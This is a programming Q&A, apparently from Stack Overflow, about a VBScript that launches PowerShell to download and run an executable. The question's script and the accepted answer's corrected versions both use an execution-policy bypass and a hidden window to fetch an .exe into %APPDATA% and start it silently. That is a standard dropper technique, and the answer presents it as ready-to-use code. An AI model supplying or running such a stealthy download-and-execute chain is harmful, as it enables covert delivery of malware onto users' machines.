# VBScript to launch powershell.exe as root and execute command

Tags: powershell, vbscript

The following VBScript gives the error:

> failing : error invalid character line 5 column 54

My VBScript:

```
dim myobject : 
set myobject = createobject ( "wscript.shell" ) : 
powershellcommand = "powershell.exe -Executionpolicy bypass -noprofile -windowstyle hidden -command Set-content -value (new-object System.net.webclient).downloaddata(  https://website.com/folder/download.exe  ) -encoding byte -Path  $env:appdata\download.exe  ; start  $env:appdata\download.exe " : 
myobject.run " & myobject.expandenvironmentstrings( "%systemroot%" ) & "\SYSTEM32\windowspowerShell\v1.0\powershell.exe" & " & ' ' & " & powershellcommand & " , 0 : set myobject = NOTHING
```

How do I fix it?

Answer (score 0, accepted):

With regard to `.run` method: essentially, the string value indicating the command line you want to run should appear exactly as it would if you typed it at the command prompt, e.g. something like

```
powershell.exe -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value  (new-object System.net.webclient).downloaddata( 'http://pspad.poradna.net/release/pspad462_setup.exe' ) -encoding byte -Path  $env:appdata\download.exe; Start-Process $env:appdata\download.exe"
```

The above command runs as expected (unfailing in `Windows 8.1/64`, PSVersion `5.1.14409.1012`). However, if you want to supply full path to `powershell` executable, then it could look as follows:

```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'http://pspad.poradna.net/release/pspad462_setup.exe' ) -encoding byte -Path  $env:appdata\download.exe;  Start-Process $env:appdata\download.exe"
```

You need to properly build such string value in `VBScript` e.g. as in the following code snippet for the latter:

```
Option Explicit
Dim WshShell, powershellcommand, objFSO, sPSexePath

Set WshShell = CreateObject("Wscript.Shell")

Set objFSO = CreateObject("Scripting.FileSystemObject")
sPSexePath = objFSO.BuildPath( WshShell.expandenvironmentstrings( "%systemroot%" ) _
     , "System32\WindowsPowerShell\v1.0\powershell.exe" ) 

powershellcommand = """" & sPSexePath & """ -Executionpolicy bypass -noprofile " _
  & " -windowstyle hidden -command ""Set-Content -value " _
  & " (new-object System.net.webclient)" _
  & ".downloaddata( 'http://pspad.poradna.net/release/pspad462_setup.exe' ) " _
  & " -encoding byte -Path  $env:appdata\download.exe; " _
  & " Start-Process $env:appdata\download.exe"""

WshShell.Run powershellcommand, 0
```

Note that in `VBScript`, a sequence of literal characters, enclosed in double quotes (`"`), is recognized as a string. A single quotation mark (`'`) is allowed within a string. **To insert a double quotation mark (`"`) into a string, it should be duplicated as `""`**.

Comment: thanks a lot, gave up on this a long time ago...Thanks anyway.